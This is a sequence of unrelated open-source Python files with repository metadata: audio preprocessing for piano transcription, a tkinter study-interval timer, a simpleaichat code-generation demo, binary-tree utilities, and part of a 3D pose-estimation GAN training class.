open(config[mode+'_fold'], 'r').readlines()\n filenames = [f.strip() for f in filenames]\n\n for file in filenames:\n # split file path string at \"/\" and take the last split, since it's the actual filename\n write_file_to_mat(config['dataset_'+mode+'_fold'] + file.split('/')[-1],\n config['audio_path'], file, audio_config, norm,\n config['is_chroma'], config['is_hpcp'])\n\n\ndef preprocess_fold_parallel(fold, mode, norm=False):\n \"\"\"Parallel preprocess an entire fold as defined in the preprocessing parameters.\n This seems only to work on Win with Anaconda!\n fold - Fold.fold_1, Fold.fold_2, Fold.fold_3, Fold.fold_4, Fold.fold_benchmark\n mode - 'train', 'valid' or 'test' to address the correct config parameter\n \"\"\"\n config = ppp.get_preprocessing_parameters(fold.value)\n audio_config = config['audio_config']\n\n # load fold\n filenames = open(config[mode+'_fold'], 'r').readlines()\n filenames = [f.strip() for f in filenames]\n\n def parallel_loop(file):\n # split file path string at \"/\" and take the last split, since it's the actual filename\n write_file_to_mat(config['dataset_'+mode+'_fold'] + file.split('/')[-1],\n config['audio_path'], file, audio_config, norm,\n config['is_chroma'], config['is_hpcp'])\n\n num_cores = multiprocessing.cpu_count()\n\n Parallel(n_jobs=num_cores)(delayed(parallel_loop)(file) for file in filenames)\n\n\ndef write_file_to_mat(write_file, base_dir, read_file, audio_config, norm, is_chroma, is_hpcp):\n \"\"\"Transforms a wav and mid file to features and writes them to a mat file.\"\"\"\n if is_hpcp:\n spectrogram = wav_to_hpcp(base_dir, read_file)\n 
else:\n spectrogram = wav_to_spec(base_dir, read_file, audio_config)\n print(spectrogram.shape)\n ground_truth = midi_to_groundtruth(base_dir, read_file, 1. / audio_config['fps'], spectrogram.shape[0], is_chroma)\n\n # re-scale spectrogram to the range [0, 1]\n if norm:\n spectrogram = np.divide(spectrogram, np.max(spectrogram))\n\n savemat(write_file, {\"features\": spectrogram, \"labels\": ground_truth})\n\n\ndef stage_dataset(fold):\n chunk = 120\n inference_chunk = 10000\n train_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/train/*.mat\".format(fold))\n valid_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/valid/*.mat\".format(fold))\n test_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/test/*.mat\".format(fold))\n train_features = []\n train_labels = []\n valid_features = []\n valid_labels = []\n test_features = []\n test_labels = []\n for file in train_files:\n data = loadmat(file)\n #train_features.append(data[\"features\"])\n tensor_features = torch.Tensor(data[\"features\"].astype(np.float64))\n train_features.extend(tensor_features.split(chunk, dim=0))\n #train_labels.append(data[\"labels\"])\n tensor_labels = torch.Tensor(data[\"labels\"].astype(np.float64))\n train_labels.extend(tensor_labels.split(chunk, dim=0))\n for file in valid_files:\n data = loadmat(file)\n # train_features.append(data[\"features\"])\n tensor_features = torch.Tensor(data[\"features\"].astype(np.float64))\n valid_features.extend(tensor_features.split(inference_chunk, dim=0))\n # train_labels.append(data[\"labels\"])\n tensor_labels = torch.Tensor(data[\"labels\"].astype(np.float64))\n valid_labels.extend(tensor_labels.split(inference_chunk, dim=0))\n for file in test_files:\n data = loadmat(file)\n # train_features.append(data[\"features\"])\n tensor_features = torch.Tensor(data[\"features\"].astype(np.float64))\n test_features.extend(tensor_features.split(inference_chunk, dim=0))\n # train_labels.append(data[\"labels\"])\n tensor_labels = torch.Tensor(data[\"labels\"].astype(np.float64))\n test_labels.extend(tensor_labels.split(inference_chunk, dim=0))\n\n #for data in [train_features, train_labels, valid_features, valid_labels]:\n # for i in range(len(data)):\n # data[i] = torch.Tensor(data[i].astype(np.float64))\n\n return train_features, train_labels, valid_features, valid_labels, test_features, test_labels\n\n\ndef chunks(sequence, length):\n for index in range(0, len(sequence) - length + 1):\n yield sequence[index:index + length]\n\n\ndef stage_overlapping_dataset(fold):\n context = 7\n chunk_size = context * 2 + 1\n\n train_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/train/*.mat\".format(fold))\n valid_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/valid/*.mat\".format(fold))\n test_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/test/*.mat\".format(fold))\n train_features = []\n train_labels = []\n valid_features = []\n valid_labels = []\n test_features = []\n test_labels = []\n for file in train_files:\n data = loadmat(file)\n #for idx in range(context, data[\"features\"].shape[0] - context):\n # features = np.reshape(data[\"features\"][idx-context:idx+context+1, :], (1, frames*data[\"features\"].shape[1]))\n # train_features.append(torch.Tensor(features.astype(np.float64)))\n features = torch.Tensor(data[\"features\"].astype(np.float64))\n train_features.extend(list(chunks(features, chunk_size)))\n\n tensor_labels = torch.Tensor(data[\"labels\"][context:-context, :].astype(np.float64))\n 
train_labels.extend(tensor_labels.split(1, dim=0))\n for file in valid_files:\n data = loadmat(file)\n\n #for idx in range(context, data[\"features\"].shape[0] - context):\n # features = np.reshape(data[\"features\"][idx - context:idx + context + 1, :],\n # (1, frames * data[\"features\"].shape[1]))\n # valid_features.append(torch.Tensor(features.astype(np.float64)))\n features = torch.Tensor(data[\"features\"].astype(np.float64))\n valid_features.extend(list(chunks(features, chunk_size)))\n\n tensor_labels = torch.Tensor(data[\"labels\"][context:-context, :].astype(np.float64))\n valid_labels.extend(tensor_labels.split(1, dim=0))\n for file in test_files:\n data = loadmat(file)\n\n #for idx in range(context, data[\"features\"].shape[0] - context):\n # features = np.reshape(data[\"features\"][idx - context:idx + context + 1, :],\n # (1, frames * data[\"features\"].shape[1]))\n # test_features.append(torch.Tensor(features.astype(np.float64)))\n\n features = torch.Tensor(data[\"features\"].astype(np.float64))\n test_features.extend(list(chunks(features, chunk_size)))\n\n tensor_labels = torch.Tensor(data[\"labels\"][context:-context, :].astype(np.float64))\n test_labels.extend(tensor_labels.split(1, dim=0))\n\n #for data in [train_features, train_labels, valid_features, valid_labels]:\n # for i in range(len(data)):\n # data[i] = torch.Tensor(data[i].astype(np.float64))\n\n return train_features, train_labels, valid_features, valid_labels, test_features, test_labels\n\n\ndef batchify(data, train_idx_list, batch_size):\n chunk = 1\n batch_data = []\n ii = 1\n #print(data[train_idx_list[0]].shape)\n curr_batch = F.pad(data[train_idx_list[0]], pad=[0, 0, 0, chunk-data[train_idx_list[0]].shape[0]], mode='constant', value=0).unsqueeze(0)\n #print(curr_batch.shape)\n for idx in train_idx_list[1:]:\n if ii == batch_size:\n ii = 0\n #print(curr_batch.shape)\n batch_data.append(curr_batch)\n curr_batch = F.pad(data[idx], pad=[0, 0, 0, chunk-data[idx].shape[0]], mode='constant', value=0).unsqueeze(0)\n else:\n curr_batch = torch.cat((curr_batch, F.pad(data[idx], pad=[0, 0, 0, chunk-data[idx].shape[0]], mode='constant', value=0).unsqueeze(0)), dim=0)\n\n ii += 1\n #batch_data.append(curr_batch)\n return batch_data\n\n\ndef data_generator(dataset):\n if dataset == \"JSB\":\n print('loading JSB data...')\n data = loadmat('./mdata/JSB_Chorales.mat')\n elif dataset == \"Muse\":\n print('loading Muse data...')\n data = loadmat('./mdata/MuseData.mat')\n elif dataset == \"Nott\":\n print('loading Nott data...')\n data = loadmat('./dataset/Nottingham.mat')\n elif dataset == \"Piano\":\n print('loading Piano data...')\n data = loadmat('./mdata/Piano_midi.mat')\n\n X_train = data['traindata'][0]\n X_valid = data['validdata'][0]\n X_test = data['testdata'][0]\n\n for data in [X_train, X_valid, X_test]:\n for i in range(len(data)):\n data[i] = torch.Tensor(data[i].astype(np.float64))\n\n return X_train, X_valid, X_test\n","repo_name":"iCorv/tcn_piano_transcription","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":12930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11243324652","text":"'''\nDescription: \nVersion: 2.0\nAutor: lxp\nDate: 2021-12-02 13:39:55\nLastEditors: lxp\nLastEditTime: 2021-12-02 14:52:44\n'''\nimport tkinter as tk\nfrom PIL import Image, ImageTk\nimport tkinter.messagebox\nfrom Learning_interval import Learning\n\"\"\"https://zhuanlan.zhihu.com/p/81429343\"\"\"\n\n\nclass Learning_Window(tk.Tk):\n def __init__(self, freq=1, music=False, interval=1):\n super(Learning_Window, self).__init__()\n self.freq = freq # 默认至少设定两次学习\n self.music = music\n self.action_time = interval\n self.action_name = \"学习\"\n self.action_time = 1\n self.play_music = True\n\n def main_run(self):\n # 顺序会按程序顺序执行\n self.create_window() # 1.创建窗口\n self.show_picture() # 2.显示图片\n self.button_design() # 3.学习按钮 单击启动学习\n self.get_int() # 4.获取学习设定次数\n self.mainloop()\n\n # 1. 窗口外观尺寸设计\n def create_window(self):\n self.geometry('300x600')\n self.title(\" Action \")\n\n # 2. 窗口 按钮设计\n def button_design(self):\n\n # 设定行为和时间\n tk.Label(self, text=\"输入行为:如学习\").pack()\n self.action_name = tk.Entry(self, textvariable=tk.StringVar()).pack()\n tk.Label(self, text=\"输入间隔:如45\").pack()\n self.action_time = tk.Entry(self, textvariable=tk.StringVar()).pack()\n\n # 提前结束按钮\n self.btn3 = tk.Button(master=self, text=\"退出\",\n command=self.exit_window).pack(padx=0, pady=20)\n\n # 4.学习主循环\n def get_int(self):\n try:\n print('设定action为:', self.action_name,\n \" 时间\" + str(self.action_time) + \"分钟/次:\")\n tk.messagebox.showinfo(\n \"提示\",\n \"已确定学习: \" + str(self.action_time) + \" 分钟/次\\n\" + \"请点击开始学习按钮\")\n self.start_learning()\n except:\n print('设定action为:', self.action_name,\n \" 时间\" + str(self.action_time) + \"分钟/次:\")\n tk.messagebox.showwarning(\"警告\", \"请输入整数\")\n\n # 3. 窗口 实现功能: 单击开始学习,获取学习次数,提前结束学习,记录学习次数\n def start_learning(self):\n learning_bool = tkinter.messagebox.askyesno(\n '提示', '确定要开始学习吗') # 是/否,返回值true/false\n # count = 0\n if learning_bool == True:\n s = Learning(counts=self.freq,\n interval=self.action_time) # 设定 学习次数,学习时长\n s.music = self.music # 是否播放音乐 bool\n print(\"学习中。。。\")\n s.start_()\n count = s.freq\n print(\"此次学习设定{}次,已完成{}次\".format(self.freq, count))\n else:\n print(\"学习已取消\")\n\n # 5. 窗口放入图片\n def show_picture(self):\n im = Image.open(r\"Projects\\学习间隙记录器\\window\\picture\\test.jpg\")\n # im = Image.open(\"picture/test.jpg\")\n global img\n img = ImageTk.PhotoImage(im)\n imLabel = tk.Label(self, image=img).pack() # 全局变量\n\n # 6、确认播放音乐\n def play_music(self):\n self.music = tkinter.messagebox.askyesno(\n '提示', '学习结束播放音乐吗?\\n 确定后点击开始学习按钮') # 是/否,返回值true/false\n\n # 7、结束退出程序\n def exit_window(self):\n self.destroy()\n print(\"已退出学习\")\n\n\nif __name__ == '__main__':\n\n win = Learning_Window()\n win.main_run()\n","repo_name":"SamLiu666/AI_for_learning","sub_path":"Projects/学习间隙记录器/window/Window_2.py","file_name":"Window_2.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18838039306","text":"from pydantic import BaseModel, Field\nfrom simpleaichat import AIChat\nfrom uuid import uuid4\nimport orjson\n\nparams = {\"temperature\": 0.0} \nmodel = \"gpt-3.5-turbo\"\n\nsystem_optimized = \"\"\"Write a Python function based on the user input.\n\nYou must obey ALL the following rules:\n- Only respond with the Python function.\n- Never put in-line comments or docstrings in your code.\"\"\"\n\n\nai_func = AIChat(console=False)\n\nclass write_python_function(BaseModel):\n \"\"\"Writes a Python function based on the user input.\"\"\"\n code: str = Field(description=\"Python code\")\n efficient_code: str = Field(description=\"More efficient Python code than previously written\")\n\ndef gen_code(question):\n id = uuid4()\n ai_func.new_session(id=id, system=system_optimized, params=params, model=model)\n response_structured = ai_func(question, id=id, output_schema=write_python_function)\n \n ai_func.delete_session(id=id)\n return response_structured\n\ncode = gen_code(\"is_palindrome\")\n# print(orjson.dumps(code, option=orjson.OPT_INDENT_2).decode())\nprint(code[\"efficient_code\"])\nprint(\"\\n\\n\")\n\n\ncode = gen_code(\"multiprocess hash\")\nprint(code[\"efficient_code\"])\nprint(\"\\n\\n\")\n\ncode = gen_code(\"reverse string\")\nprint(code[\"efficient_code\"])\nprint(\"\\n\\n\")\n","repo_name":"flyq/llm_demo","sub_path":"simpleaichat/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14215519161","text":"import copy\n\nfrom src.single_tree.development_tree import Axis, TreeNode, NONE_NODE\n\n\n# Returns the number with the highest bit only\n# 0 -> 0\n# 1 -> 1\n# 2 -> 2\n# 3 -> 2\n# ...\n# 255 -> 128\n# 256 -> 256\n# ...\ndef hi_bit(n):\n n |= (n >> 1)\n n |= (n >> 2)\n n |= (n >> 4)\n n |= (n >> 8)\n n |= (n >> 16)\n n |= (n >> 32)\n return n - (n >> 1)\n\n\n# Iterates over all chains of the full binary tree of the height 'max_level'\ndef get_address(number):\n if number == 0:\n return \"\"\n res = \"Z\"\n cur_mask = hi_bit(number) >> 1\n while cur_mask > 0:\n res += (\".L\" if cur_mask & number == 0 else \".R\")\n cur_mask >>= 1\n return res\n\n\n# Returns a chain in the infinite full binary tree by number\n# Each chain the infinite full binary tree has a unique number\n# (There is a bijection between numbers 0..inf and chains)\ndef get_chain(number):\n if number == 0:\n return NONE_NODE\n root = TreeNode(address=\"Z\", axis=Axis.X)\n root.left = NONE_NODE\n root.right = NONE_NODE\n\n # iterate over bits from the highest to the 0th\n cur_node = root\n cur_mask = hi_bit(number) >> 1\n while cur_mask > 0:\n if cur_mask & number == 0:\n cur_node.left = TreeNode(address=cur_node.address + \".L\", axis=Axis.X, left=NONE_NODE, right=NONE_NODE)\n cur_node = cur_node.left\n else:\n cur_node.right = TreeNode(address=cur_node.address + \".R\", axis=Axis.X, left=NONE_NODE, right=NONE_NODE)\n cur_node = cur_node.right\n cur_mask >>= 1\n return root\n\n\n# Iterates over all subtrees of the binary tree 'node'\ndef get_subtrees(node):\n yield NONE_NODE # no node\n if not node.is_none():\n left_nodes = [x for x in get_subtrees(node.left)]\n right_nodes = [x for x in get_subtrees(node.right)]\n for left_node in left_nodes:\n for right_node in right_nodes:\n copy_node = copy.copy(node)\n copy_node.left = left_node\n copy_node.right = right_node\n if copy_node.left.is_none() and copy_node.right.is_none():\n copy_node.axis = Axis.NONE\n yield copy_node\n\n\n# Generates a full bin tree of height 'max_level'\ndef generate_bin_tree(max_level, address=\"Z\", reduced_level=0):\n if max_level == 0:\n return NONE_NODE\n\n node = TreeNode(axis=Axis.X, address=address, reduced_address=address, reduced_level=reduced_level, left=NONE_NODE, right=NONE_NODE)\n node.left = generate_bin_tree(max_level - 1, address + \".L\", reduced_level + 1)\n node.right = generate_bin_tree(max_level - 1, address + \".R\", reduced_level + 1)\n return node\n\n\ndef get_deepest_node(node):\n if node.is_none():\n return node\n\n if not node.left.is_none():\n return get_deepest_node(node.left)\n\n if not node.right.is_none():\n return get_deepest_node(node.right)\n\n return node\n\n\ndef iterate_nodes(node1, node2):\n if not (node1.left.is_none() and node2.left.is_none()):\n for x in iterate_nodes(node1.left, node2.left):\n yield x\n yield [node1, node2]\n if not (node1.right.is_none() and node2.right.is_none()):\n for x in iterate_nodes(node1.right, node2.right):\n yield x\n\n\n# Returns number of the node at the level\n# left to right direction\n#\n# root - the root of the tree\n# address - address of the node\n# is_reduced - True to use reduced tree attributes, False to use \"raw\" tree attributes\ndef number_by_address(root1, root2, address, is_reducing):\n level = int(len(address) / 2)\n\n nodes_at_level = [x for x in filter(lambda x: (x[0].reduced_level == level and not x[0].is_none()) or (x[1].reduced_level == level and not x[1].is_none()),\n iterate_nodes(root1, root2))]\n\n for i, [item1, item2] in 
enumerate(nodes_at_level):\n if (item1.reduced_address == address and not item1.is_none()) or (item2.reduced_address == address and not item2.is_none()):\n return i + 1\n return None # not found\n\n# for i in range(16):\n# subtree = get_chain(i)\n# print(f\"{i} - {get_address(i)} - {'()' if subtree is None else get_deepest_node(subtree)}\")\n\n\n# for level in range(6):\n# root = generate_bin_tree(level)\n# #print(f\"root: {'()' if root is None else root.full_tree_str()}\")\n# count = 0\n# for subtree in get_subtrees(root):\n# #print(f\"{'()' if subtree is None else subtree.full_tree_str()}\")\n# count += 1\n#\n# print(f\"level: {level}, count: {count}\")\n","repo_name":"npakudin/embrionic_tree","sub_path":"src/multiple_trees/iterate_trees.py","file_name":"iterate_trees.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"75237084034","text":"import os\nimport os.path as path\nimport pickle\nfrom time import time\n\nimport numpy as np\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\n\nfrom common.camera import *\nfrom common.generators import ChunkedGenerator, UnchunkedGenerator, ChunkedNoPadGeneratorV5\nfrom common.loss import *\nfrom common.model import *\nfrom common.utils import deterministic_random\nfrom function.gan_utils import pose_seq_bl_aug\nfrom function.logger import create_logger\nfrom function.utils import Summary, get_scheduler, get_discriminator_accuracy, Sample_from_Pool, get_contacts\n\n'''\nbasement class\n'''\n\n\nclass PoseGANBasement(object):\n def __init__(self, args):\n # init param\n self.device = torch.device(\"cuda\")\n self.args = args\n\n # define checkpoint directory # Create checkpoint directory if it does not exist\n # self.args.checkpoint = path.join(self.args.checkpoint, self.args.note,\n # datetime.datetime.now().strftime('%m%d%H%M%S'))\n self.args.checkpoint = path.join(self.args.checkpoint, self.args.note)\n print('INFO: creat log folder at {}'.format(self.args.checkpoint))\n os.makedirs(self.args.checkpoint, exist_ok=True)\n os.makedirs(os.path.join(self.args.checkpoint, 'ckpt'), exist_ok=True)\n\n # prepare monitor\n # Init monitor for net work training\n #########################################################\n self.summary = Summary(self.args.checkpoint)\n self.writer = self.summary.create_summary()\n self.logger = create_logger(os.path.join(self.args.checkpoint, 'log.txt'))\n self.logger.info(args)\n\n def logging(self, val_rlt, epoch_start_time):\n \"\"\"\n recording the process of posenet, and saving model.\n \"\"\"\n lr = self.optimizer_P.param_groups[0]['lr']\n losses_str = ' '.join(['{}: {:.4f}'.format(val_set_key, val_rlt[val_set_key]['p1']) \\\n for val_set_key in val_rlt])\n dt = (time() - epoch_start_time) / 60\n self.logger.info(\n '====> Epoch: {} Time: {:.2f} min {} lr: {:.5f}'.format(self.summary.epoch, dt, losses_str, lr))\n\n # record the result list and save ckpt\n if self.summary.epoch <= 2:\n self.h36m_p1_s911 = []\n self.h36m_p1_s911.append(val_rlt['s911']['p1'])\n # Save checkpoint if necessary\n if self.h36m_p1_s911[-1] == min(self.h36m_p1_s911):\n ckpt_path = os.path.join(self.args.checkpoint, 'ckpt', 'best_ckpt_S911.bin')\n self.logger.info('Saving checkpoint to{}'.format(ckpt_path))\n torch.save({\n 'model_pos': self.model_pos_train.state_dict(),\n 'model_traj': self.model_traj_train.state_dict(),\n }, ckpt_path)\n\n if self.summary.epoch % 5 == 0:\n ckpt_path = os.path.join(self.args.checkpoint, 'ckpt', 'ckpt_ep_{:0>3d}.bin'.format(self.summary.epoch))\n self.logger.info('Saving checkpoint to{}'.format(ckpt_path))\n torch.save({\n 'model_pos': self.model_pos_train.state_dict(),\n 'model_traj': self.model_traj_train.state_dict(),\n }, ckpt_path)\n\n def data_preparation(self):\n ###################################\n # prepare data\n ###################################\n self.logger.info('Loading dataset...')\n dataset_path = 'data/data_3d_' + self.args.dataset + '.npz'\n if self.args.dataset == 'h36m':\n from common.h36m_dataset import Human36mDataset\n self.dataset = Human36mDataset(dataset_path)\n else:\n raise KeyError('Invalid dataset')\n\n self.logger.info('Preparing dataset...')\n for subject in self.dataset.subjects():\n for action in self.dataset[subject].keys():\n anim = self.dataset[subject][action]\n\n if 'positions' in anim:\n positions_3d = []\n for cam in 
anim['cameras']:\n pos_3d = world_to_camera(anim['positions'], R=cam['orientation'], t=cam['translation'])\n # pos_3d[:, 1:] -= pos_3d[:, :1] # Remove global offset, but keep trajectory in first position, no, keep here\n positions_3d.append(pos_3d) # T x J x 3\n anim['positions_3d'] = positions_3d\n\n if 'positions' in anim:\n contact_labels = []\n for cam in anim['cameras']:\n contact_label = get_contacts(anim['positions'])\n contact_labels.append(contact_label) # T x 2 x 1\n anim['contact_labels'] = contact_labels\n\n self.keypoints_preparation()\n\n def keypoints_preparation(self):\n # 2D keypoint\n self.logger.info('Loading 2D detections...')\n self.keypoints = np.load('data/data_2d_' + self.args.dataset + '_' + self.args.keypoints + '.npz',\n allow_pickle=True)\n # keypoints_metadata = self.keypoints['metadata'].item()\n keypoints_metadata = {'num_joints': 16,\n 'keypoints_symmetry': [[4, 5, 6, 10, 11, 12], [1, 2, 3, 13, 14, 15]]}\n\n keypoints_symmetry = keypoints_metadata['keypoints_symmetry']\n self.kps_left, self.kps_right = list(keypoints_symmetry[0]), list(keypoints_symmetry[1])\n self.joints_left, self.joints_right = list(self.dataset.skeleton().joints_left()), list(\n self.dataset.skeleton().joints_right())\n self.keypoints = self.keypoints['positions_2d'].item()\n\n for subject in self.dataset.subjects():\n assert subject in self.keypoints, 'Subject {} is missing from the 2D detections dataset'.format(subject)\n for action in self.dataset[subject].keys():\n assert action in self.keypoints[\n subject], 'Action {} of subject {} is missing from the 2D detections dataset'.format(action,\n subject)\n if 'positions_3d' not in self.dataset[subject][action]:\n continue\n\n for cam_idx in range(len(self.keypoints[subject][action])):\n\n # We check for >= instead of == because some videos in H3.6M contain extra frames\n mocap_length = self.dataset[subject][action]['positions_3d'][cam_idx].shape[0]\n assert self.keypoints[subject][action][cam_idx].shape[0] >= mocap_length\n\n if self.keypoints[subject][action][cam_idx].shape[0] > mocap_length:\n # Shorten sequence\n self.keypoints[subject][action][cam_idx] = self.keypoints[subject][action][cam_idx][\n :mocap_length]\n\n assert len(self.keypoints[subject][action]) == len(self.dataset[subject][action]['positions_3d'])\n\n # norm keypoint\n for subject in self.keypoints.keys():\n for action in self.keypoints[subject]:\n for cam_idx, kps in enumerate(self.keypoints[subject][action]):\n # Normalize camera frame\n cam = self.dataset.cameras()[subject][cam_idx]\n kps[..., :2] = normalize_screen_coordinates(kps[..., :2], w=cam['res_w'], h=cam['res_h'])\n self.keypoints[subject][action][cam_idx] = kps\n\n def fetch(self, subjects, action_filter=None, subset=1, parse_3d_poses=True):\n out_poses_3d = []\n out_poses_2d = []\n out_camera_params = []\n out_camera_rtparams = []\n out_contact_labels = []\n for subject in subjects:\n for action in self.keypoints[subject].keys():\n if action_filter is not None:\n found = False\n for a in action_filter:\n if action.startswith(a):\n found = True\n break\n if not found:\n continue\n\n poses_2d = self.keypoints[subject][action]\n for i in range(len(poses_2d)): # Iterate across cameras\n out_poses_2d.append(poses_2d[i])\n\n if subject in self.dataset.cameras():\n cams = self.dataset.cameras()[subject]\n assert len(cams) == len(poses_2d), 'Camera count mismatch'\n for cam in cams:\n if 'intrinsic' in cam:\n out_camera_params.append(cam['intrinsic'])\n if 'extrinsic' in cam:\n 
out_camera_rtparams.append(cam['extrinsic'])\n\n if parse_3d_poses and 'positions_3d' in self.dataset[subject][action]:\n poses_3d = self.dataset[subject][action]['positions_3d']\n assert len(poses_3d) == len(poses_2d), 'Camera count mismatch'\n for i in range(len(poses_3d)): # Iterate across cameras\n out_poses_3d.append(poses_3d[i])\n\n # for contact labels, same as poses_3d\n if parse_3d_poses and 'contact_labels' in self.dataset[subject][action]:\n contact_labels = self.dataset[subject][action]['contact_labels']\n assert len(contact_labels) == len(poses_2d), 'Camera count mismatch'\n for i in range(len(contact_labels)): # Iterate across cameras\n out_contact_labels.append(contact_labels[i])\n\n if len(out_camera_params) == 0:\n assert False\n if len(out_camera_rtparams) == 0:\n assert False\n if len(out_poses_3d) == 0:\n assert False\n if len(out_contact_labels) == 0:\n assert False\n\n stride = self.args.downsample\n if subset < 1:\n for i in range(len(out_poses_2d)):\n n_frames = int(round(len(out_poses_2d[i]) // stride * subset) * stride)\n start = deterministic_random(0, len(out_poses_2d[i]) - n_frames + 1, str(len(out_poses_2d[i])))\n out_poses_2d[i] = out_poses_2d[i][start:start + n_frames:stride]\n if out_poses_3d is not None:\n out_poses_3d[i] = out_poses_3d[i][start:start + n_frames:stride]\n elif stride > 1:\n # Downsample as requested\n for i in range(len(out_poses_2d)):\n out_poses_2d[i] = out_poses_2d[i][::stride]\n if out_poses_3d is not None:\n out_poses_3d[i] = out_poses_3d[i][::stride]\n out_contact_labels[i] = out_contact_labels[i][::stride]\n\n return out_camera_params, out_camera_rtparams, out_poses_3d, out_poses_2d, out_contact_labels\n\n def dataloader_preparation(self):\n action_filter = None if self.args.actions == '*' else self.args.actions.split(',')\n if action_filter is not None:\n self.logger.info('Selected actions:{}'.format(action_filter))\n\n ###################################\n # train subject # test subject\n ###################################\n subjects_train = self.args.subjects_train.split(',')\n subjects_test = self.args.subjects_test.split(',')\n\n cameras_train, cam_rt_train, poses_train, poses_train_2d, contact_train = self.fetch(subjects_train,\n action_filter,\n subset=self.args.subset)\n cameras_valid, cam_rt_valid, poses_valid, self.poses_valid_2d, contact_valid = self.fetch(subjects_test,\n action_filter)\n causal_shift = 0\n self.pad = (np.prod([int(x) for x in self.args.architecture.split(',')]) - 1) // 2\n self.rf = np.prod([int(x) for x in self.args.architecture.split(',')])\n\n\n ##################################################################\n ##### linkstart: load expert,\n ##################################################################\n self.logger.info('INFO: self.args.expert_dict_path: {}'.format(self.args.expert_dict_path))\n if self.args.expert_dict_path is None:\n expert_dict = {'h36m_take_000':{'skt_wpos':np.ones((500, 16, 3))}}\n take_list = ['h36m_take_000']\n else:\n expert_feat_file = self.args.expert_dict_path\n expert_dict = pickle.load(open(expert_feat_file, 'rb'))\n # take_list = [take for take in expert_dict if expert_dict[take]['t_num_reset'] == 0] # maybe filter some\n take_list = ['h36m_take_{:0>3d}'.format(i) for i in range(600)]\n\n # load expert from rib-rl\n self.logger.info('INFO: self.args.extra_expert_dict_path: {}'.format(self.args.extra_expert_dict_path))\n if self.args.extra_expert_dict_path is None:\n extra_expert_dict = None\n extra_take_list = []\n else:\n extra_expert_feat_file = 
self.args.extra_expert_dict_path\n extra_expert_dict = pickle.load(open(extra_expert_feat_file, 'rb'))\n extra_take_list = [take for take in extra_expert_dict if extra_expert_dict[take]['t_num_reset'] == 0]\n\n ######################################################################\n # prepare a basement for every epoch update\n self.fixed_fake_database = {\n 'cam_rt_train': cam_rt_train,\n 'cameras_train': cameras_train,\n 'take_list': take_list,\n 'expert_dict': expert_dict,\n 'causal_shift': causal_shift,\n 'extra_expert_dict': extra_expert_dict,\n 'extra_take_list': extra_take_list,\n }\n\n\n skt_pos_train = []\n skt_pos_train_2dtarget = []\n\n for i, take in enumerate(take_list):\n # assume expert is less and shorter than h36m.\n skt_pos_train.append(world2cam_sktpos(expert_dict[take]['skt_wpos']))\n # skt_pos_train.append(world2cam_sktpos(reset_spine(expert_dict[take]['skt_wpos'])))\n skt_pos_train_2dtarget.append(poses_train_2d[i][10:expert_dict[take]['skt_wpos'].shape[0] + 10])\n\n ########################################################################################\n # extra\n for i, take in enumerate(extra_take_list):\n # assume expert is less and shorter than h36m.\n skt_pos_train.append(world2cam_sktpos(extra_expert_dict[take]['skt_wpos']))\n # skt_pos_train.append(world2cam_sktpos(reset_spine(extra_expert_dict[take]['skt_wpos'])))\n skt_pos_train_2dtarget.append(poses_train_2d[i%len(poses_train_2d)][10:extra_expert_dict[take]['skt_wpos'].shape[0] + 10])\n ########################################################################################\n\n # prepare data for augmenting\n aug_pad = self.pad\n self.aug_generator = ChunkedNoPadGeneratorV5(self.args.batch_size // self.args.stride, None, None,\n skt_pos_train, skt_pos_train_2dtarget, None, self.args.stride,\n pad=aug_pad, causal_shift=causal_shift, shuffle=True,\n # augment=True,\n augment=self.args.data_augmentation,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left, joints_right=self.joints_right)\n self.logger.info('INFO: aug-supervision on {} frames'.format(self.aug_generator.num_frames()))\n self.fake_cam_sample = Sample_from_Pool(max_elements=self.args.batch_size)\n\n # train loader s15678 eval\n train_generator_eval = UnchunkedGenerator(cam_rt_train, poses_train, poses_train_2d,\n pad=self.pad, causal_shift=causal_shift, augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > train_generator_eval'.format(train_generator_eval.num_frames()))\n train_generator_eval_flip = UnchunkedGenerator(cam_rt_train, poses_train, poses_train_2d,\n pad=self.pad, causal_shift=causal_shift, augment=True,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > train_generator_eval_flip'.format(train_generator_eval_flip.num_frames()))\n # test loader -- S911\n test_generator_s911 = UnchunkedGenerator(None, poses_valid, self.poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=False,\n kps_left=self.kps_left, kps_right=self.kps_right,\n joints_left=self.joints_left,\n joints_right=self.joints_right)\n self.logger.info('INFO: Testing on {} frames > test_generator_s911'.format(test_generator_s911.num_frames()))\n test_generator_s911_flip = UnchunkedGenerator(None, poses_valid, self.poses_valid_2d,\n pad=self.pad, causal_shift=causal_shift, augment=True,\n 
